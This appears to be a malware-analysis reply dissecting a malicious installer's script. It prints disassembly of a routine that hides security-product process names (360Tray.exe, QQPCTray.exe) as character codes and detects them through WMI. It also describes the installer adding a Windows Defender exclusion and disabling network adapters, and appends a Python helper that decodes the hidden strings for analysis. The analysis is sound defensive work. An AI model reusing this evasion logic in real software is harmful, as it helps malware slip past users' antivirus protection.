Reply: This function checks for the 360 main-defense process; if it is present, it disconnects the network. In detail: the function calls the "IS360PROCESSRUNNING" function in the code to determine whether the 360 main-defense process "360Tray.exe" exists, and then follows different logic depending on the result.

Checking whether the 360 process is running:

; lines 8-14 of the code
pushtype BOOLEAN ; StackCount = 8
pushvar Var8 ; StackCount = 9
call INITIALIZESETUP ; initialize setup
pop ; StackCount = 8
pop ; StackCount = 7
pushvar Var1 ; StackCount = 8
call IS360PROCESSRUNNING ; check whether the 360 Safeguard process is running
pop ; StackCount = 7
Checking the result and the conditional jump:

; lines 15-22 of the code
pushtype BOOLEAN ; StackCount = 8
assign Var8, Var1 ; copy the return value of "IS360PROCESSRUNNING" (held in Var1) into Var8 for the following test
setz Var8 ; test whether Var8 is false (0)
sfz Var8 ; based on the sfz result, if Var8 is false (i.e. the 360 process is not running), jump to label loc_263f
pop ; StackCount = 7
jf loc_263f
Execution paths:
If the 360 process is running: execution continues in the current block (from line 23), which then calls "ADDDEFENDEREXCLUSION" (add a Windows Defender exclusion) and "OBFUSCATEDEXTRACT".
If the 360 process is not running: execution jumps to label loc_263f, which first calls "ADDDEFENDEREXCLUSION" (add a Windows Defender exclusion) and then "DISABLENETWORKADAPTERS" (disconnect the network).
Let's look at the "IS360PROCESSRUNNING" function:

.function(export) BOOLEAN IS360PROCESSRUNNING()
pushtype Variant ; StackCount = 1
pushtype Variant ; StackCount = 2
pushtype Variant ; StackCount = 3
pushtype UnicodeString_2 ; StackCount = 4
pushtype UnicodeString_2 ; StackCount = 5
pushtype UnicodeString_2 ; StackCount = 6
pushtype UnicodeString_2 ; StackCount = 7
assign RetVal, BOOLEAN(0)
starteh null, loc_8a1, null, loc_8af
pushtype IDISPATCH ; StackCount = 8
pushtype UnicodeString_2 ; StackCount = 9
pushtype Type30 ; StackCount = 10
pushtype Type30 ; StackCount = 11
pushtype S32 ; StackCount = 12
assign Var12, S32(26)
pushvar Var11 ; StackCount = 13
call SETARRAYLENGTH
pop ; StackCount = 12
pop ; StackCount = 11
assign Var11[0], S32(87)
assign Var11[1], S32(66)
assign Var11[2], S32(69)
assign Var11[3], S32(77)
assign Var11[4], S32(83)
assign Var11[5], S32(99)
assign Var11[6], S32(114)
assign Var11[7], S32(105)
assign Var11[8], S32(112)
assign Var11[9], S32(116)
assign Var11[10], S32(105)
assign Var11[11], S32(110)
assign Var11[12], S32(103)
assign Var11[13], S32(46)
assign Var11[14], S32(83)
assign Var11[15], S32(87)
assign Var11[16], S32(66)
assign Var11[17], S32(69)
assign Var11[18], S32(77)
assign Var11[19], S32(76)
assign Var11[20], S32(111)
assign Var11[21], S32(99)
assign Var11[22], S32(97)
assign Var11[23], S32(116)
assign Var11[24], S32(111)
assign Var11[25], S32(114)
assign Var10, Var11
pop ; StackCount = 10
pushvar Var9 ; StackCount = 11
call STRFROMCODE
pop ; StackCount = 10
pop ; StackCount = 9
pushvar Var8 ; StackCount = 10
call CREATEOLEOBJECT
pop ; StackCount = 9
pop ; StackCount = 8
assign Var1, Var8
pop ; StackCount = 7
pushtype !OPENARRAYOFVARIANT ; StackCount = 8
pushtype !OPENARRAYOFVARIANT ; StackCount = 9
pushtype S32 ; StackCount = 10
assign Var10, S32(2)
pushvar Var9 ; StackCount = 11
call SETARRAYLENGTH
pop ; StackCount = 10
pop ; StackCount = 9
assign Var9[0], String_3("")
assign Var9[1], String_3("root\cimv2")
assign Var8, Var9
pop ; StackCount = 8
pushtype String_3 ; StackCount = 9
assign Var9, String_3("ConnectServer")
pushtype BOOLEAN ; StackCount = 10
assign Var10, BOOLEAN(0)
pushtype IDISPATCH ; StackCount = 11
assign Var11, Var1
pushvar Var2 ; StackCount = 12
call IDISPATCHINVOKE
pop ; StackCount = 11
pop ; StackCount = 10
pop ; StackCount = 9
pop ; StackCount = 8
pop ; StackCount = 7
pushtype Type30 ; StackCount = 8
pushtype Type30 ; StackCount = 9
pushtype S32 ; StackCount = 10
assign Var10, S32(11)
pushvar Var9 ; StackCount = 11
call SETARRAYLENGTH
pop ; StackCount = 10
pop ; StackCount = 9
assign Var9[0], S32(51)
assign Var9[1], S32(54)
assign Var9[2], S32(48)
assign Var9[3], S32(116)
assign Var9[4], S32(114)
assign Var9[5], S32(97)
assign Var9[6], S32(121)
assign Var9[7], S32(46)
assign Var9[8], S32(101)
assign Var9[9], S32(120)
assign Var9[10], S32(101)
assign Var8, Var9
pop ; StackCount = 8
pushvar Var5 ; StackCount = 9
call STRFROMCODE
pop ; StackCount = 8
pop ; StackCount = 7
pushtype Type30 ; StackCount = 8
pushtype Type30 ; StackCount = 9
pushtype S32 ; StackCount = 10
assign Var10, S32(11)
pushvar Var9 ; StackCount = 11
call SETARRAYLENGTH
pop ; StackCount = 10
pop ; StackCount = 9
assign Var9[0], S32(51)
assign Var9[1], S32(54)
assign Var9[2], S32(48)
assign Var9[3], S32(84)
assign Var9[4], S32(114)
assign Var9[5], S32(97)
assign Var9[6], S32(121)
assign Var9[7], S32(46)
assign Var9[8], S32(101)
assign Var9[9], S32(120)
assign Var9[10], S32(101)
assign Var8, Var9
pop ; StackCount = 8
pushvar Var6 ; StackCount = 9
call STRFROMCODE
pop ; StackCount = 8
pop ; StackCount = 7
pushtype Type30 ; StackCount = 8
pushtype Type30 ; StackCount = 9
pushtype S32 ; StackCount = 10
assign Var10, S32(12)
pushvar Var9 ; StackCount = 11
call SETARRAYLENGTH
pop ; StackCount = 10
pop ; StackCount = 9
assign Var9[0], S32(81)
assign Var9[1], S32(81)
assign Var9[2], S32(80)
assign Var9[3], S32(67)
assign Var9[4], S32(84)
assign Var9[5], S32(114)
assign Var9[6], S32(97)
assign Var9[7], S32(121)
assign Var9[8], S32(46)
assign Var9[9], S32(101)
assign Var9[10], S32(120)
assign Var9[11], S32(101)
assign Var8, Var9
pop ; StackCount = 8
pushvar Var7 ; StackCount = 9
call STRFROMCODE
pop ; StackCount = 8
pop ; StackCount = 7
pushtype WideString ; StackCount = 8
assign Var8, String_3("SELECT * FROM Win32_Process WHERE Name="")
add Var8, Var5
add Var8, String_3("" OR ")
add Var8, String_3("Name="")
add Var8, Var6
add Var8, String_3("" OR ")
add Var8, String_3("Name="")
add Var8, Var7
add Var8, Char(""")
assign Var4, Var8
pop ; StackCount = 7
pushtype !OPENARRAYOFVARIANT ; StackCount = 8
pushtype !OPENARRAYOFVARIANT ; StackCount = 9
pushtype S32 ; StackCount = 10
assign Var10, S32(1)
pushvar Var9 ; StackCount = 11
call SETARRAYLENGTH
pop ; StackCount = 10
pop ; StackCount = 9
assign Var9[0], Var4
assign Var8, Var9
pop ; StackCount = 8
pushtype String
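Added example (not part of the original reply or of the installer being analysed): the listing builds every sensitive string as an array of character codes and passes it to STRFROMCODE, so an analyst reading the disassembly wants those arrays decoded rather than reading them by hand. The Python helper below walks a disassembly excerpt, pairs each `assign VarN[i], S32(x)` array with the `call STRFROMCODE` that consumes it, and names the result after the variable pushed just before the call. The embedded excerpt is copied from the IS360PROCESSRUNNING listing above (the Var6 and Var7 arrays); the regexes and the assumption that the most recently filled array is the one STRFROMCODE decodes are mine, based on the listing's shape. The second function reassembles the WQL query the function concatenates from the decoded names, which is the same `SELECT * FROM Win32_Process WHERE Name=...` string shown in the listing, so the decoded process names can be fed straight into a detection rule or an analysis note.

```python
import re
from typing import Dict, List

# Constructed excerpt, copied from the IS360PROCESSRUNNING listing above:
# two STRFROMCODE char-code arrays and the instructions around them.
SAMPLE_LISTING = """\
pushtype S32 ; StackCount = 10
assign Var10, S32(11)
pushvar Var9 ; StackCount = 11
call SETARRAYLENGTH
assign Var9[0], S32(51)
assign Var9[1], S32(54)
assign Var9[2], S32(48)
assign Var9[3], S32(84)
assign Var9[4], S32(114)
assign Var9[5], S32(97)
assign Var9[6], S32(121)
assign Var9[7], S32(46)
assign Var9[8], S32(101)
assign Var9[9], S32(120)
assign Var9[10], S32(101)
assign Var8, Var9
pop ; StackCount = 8
pushvar Var6 ; StackCount = 9
call STRFROMCODE
pop ; StackCount = 8
assign Var10, S32(12)
pushvar Var9 ; StackCount = 11
call SETARRAYLENGTH
assign Var9[0], S32(81)
assign Var9[1], S32(81)
assign Var9[2], S32(80)
assign Var9[3], S32(67)
assign Var9[4], S32(84)
assign Var9[5], S32(114)
assign Var9[6], S32(97)
assign Var9[7], S32(121)
assign Var9[8], S32(46)
assign Var9[9], S32(101)
assign Var9[10], S32(120)
assign Var9[11], S32(101)
assign Var8, Var9
pop ; StackCount = 8
pushvar Var7 ; StackCount = 9
call STRFROMCODE
"""

# Instruction shapes taken from the listing; regexes are my own assumption.
ELEM_RE = re.compile(r"^\s*assign\s+(Var\d+)\[(\d+)\],\s*S32\((\d+)\)")
PUSHVAR_RE = re.compile(r"^\s*pushvar\s+(Var\d+)")
STRFROMCODE_RE = re.compile(r"^\s*call\s+STRFROMCODE\b")


def decode_strfromcode(listing: str) -> Dict[str, str]:
    """Recover every string the listing builds through STRFROMCODE.

    Returns {output_variable: decoded_string}. The output variable is the one
    pushed with `pushvar` right before `call STRFROMCODE`; the source array is
    the most recently filled S32 array (assumption drawn from the listing).
    """
    arrays: Dict[str, Dict[int, int]] = {}
    last_filled = None
    last_pushed = None
    decoded: Dict[str, str] = {}
    for line in listing.splitlines():
        m = ELEM_RE.match(line)
        if m:
            var, idx, code = m.group(1), int(m.group(2)), int(m.group(3))
            arrays.setdefault(var, {})[idx] = code
            last_filled = var
            continue
        m = PUSHVAR_RE.match(line)
        if m:
            last_pushed = m.group(1)
            continue
        if STRFROMCODE_RE.match(line) and last_filled and last_pushed:
            codes = arrays.pop(last_filled)
            # Join in index order so out-of-order assigns still decode correctly.
            decoded[last_pushed] = "".join(chr(codes[i]) for i in sorted(codes))
            last_filled = None
    return decoded


def build_process_query(names: List[str]) -> str:
    """Reassemble the WQL string the listing concatenates from the decoded names."""
    clause = " OR ".join(f'Name="{n}"' for n in names)
    return f"SELECT * FROM Win32_Process WHERE {clause}"


if __name__ == "__main__":
    strings = decode_strfromcode(SAMPLE_LISTING)
    for var, text in strings.items():
        print(f"{var} = {text!r}")
    print(build_process_query(list(strings.values())))
```

Running it on the full listing (with the Var11 and Var5 arrays included) decodes the CreateOleObject class name as well as all three process names; on the excerpt above it yields Var6 = "360Tray.exe" and Var7 = "QQPCTray.exe", which confirms that the check also looks for the Tencent PC Manager tray process and not only for 360.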

